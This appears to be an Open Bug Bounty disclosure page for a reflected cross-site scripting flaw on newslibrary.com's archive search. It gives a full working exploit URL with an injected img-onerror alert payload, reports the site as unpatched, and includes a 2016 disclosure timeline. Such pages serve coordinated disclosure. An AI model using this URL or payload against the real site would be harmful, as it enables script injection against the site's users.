Vulnerable URL:
http://newslibrary.com/nl-search/we/Archives?p_product=APAB&p;_theme=%3Cimg%20src=x%20onerror=alert(%22OPENBUGBOUNTY%22)%3E&p;_action=search&p;_maxdocs=wwwwww%3C%3E%22%20%27&s;_dispstring=qqqqqqq%26lt;%26gt;%22%20%27&p;_field_advanced-0=&p;_text_advanced-0=(%22qqqqqqq%3C%3E%22%20%27%22)&xcal;_numdocs=20&p;_perpage=10&p;_sort=YMD_date:D&xcal;_useweights=no
Details:
Description |
Value |
Patched: |
No |
Latest check for patch: |
27.07.2017 |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
939256 |
VIP website status: |
No |
Check newslibrary.com SSL connection: |
(Grade: F) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
20 July, 2016 18:45 GMT |
Generic security notifications sent to website owner |
20 July, 2016 18:47 GMT |
Notification sent to subscribers (without technical details) |
20 July, 2016 22:17 GMT |
Vulnerability details disclosed by researcher |
17 August, 2016 19:12 GMT |